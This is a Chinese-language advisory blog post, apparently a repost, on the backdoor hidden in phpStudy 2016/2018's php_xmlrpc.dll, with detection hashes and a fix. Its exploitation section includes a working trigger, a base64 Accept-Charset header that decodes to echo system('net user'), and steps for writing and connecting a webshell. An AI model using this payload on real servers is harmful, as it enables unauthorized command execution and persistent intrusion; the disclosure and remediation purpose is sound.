Phpstudy隱藏后門
1.事件背景
Phpstudy軟體是國內的一款免費的PHP除錯環境的程式集成包,通過集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款軟體一次性安裝,無需配置即可直接安裝使用,具有PHP環境除錯和PHP開發功能,在國內有著近百萬PHP語言學習者、開發者用戶
9月20日杭州公安微信公眾賬號發布了“杭州警方通報打擊涉網違法犯罪暨“凈網2019”專項行動戰果”的文章,文章里說明phpstudy存在“后門”
2.影響版本
軟體作者宣告phpstudy 2016版PHP5.4存在后門,
實際測驗官網下載phpstudy2018版php-5.2.17和php-5.4.45也同樣存在后門
3.后門檢測方法
通過分析,后門代碼存在于\ext\php_xmlrpc.dll模塊中
phpStudy2016和phpStudy2018自帶的php-5.2.17、php-5.4.45
phpStudy2016路徑
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路徑
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl
用記事本打開此檔案查找@eval,檔案存在@eval(%s(‘%s’))證明漏洞存在
附后門檔案MD5值:
MD5: 0F7AD38E7A9857523DFBCE4BCE43A9E9
MD5: C339482FD2B233FB0A555B629C0EA5D5
4. 后門利用手法
將含有后門的phpstudy 運行起來 然后訪問網站
訪問目標站點
抓取訪問包 修改請求包內容 直接觸發遠程命令執行
Accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 base64加密的 解密后 echo system("net user");
添加 遠程命令 觸發后門
5 得到路徑 并寫入shell檔案
Ps !! 在這里要首先了解下 web寫入后門木馬的誤區
用^轉移 >< 不然<>會自動轉換為別的格式
連接 webshell
6 修復方案
1、可以從PHP官網下載原始php-5.4.45版本或php-5.2.17版本,替換其中的php_xmlrpc.dll
https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip
https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip
2、目前phpstudy官網上的版本不存在后門,可在phpsudy官網下載安裝包進行更新
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/181301.html
標籤:其他
上一篇:【Jenkins+Ansible+Gitlab 自動化部署三劍客】學習筆記-第五章 5-1~5-5 Freestyle Job實戰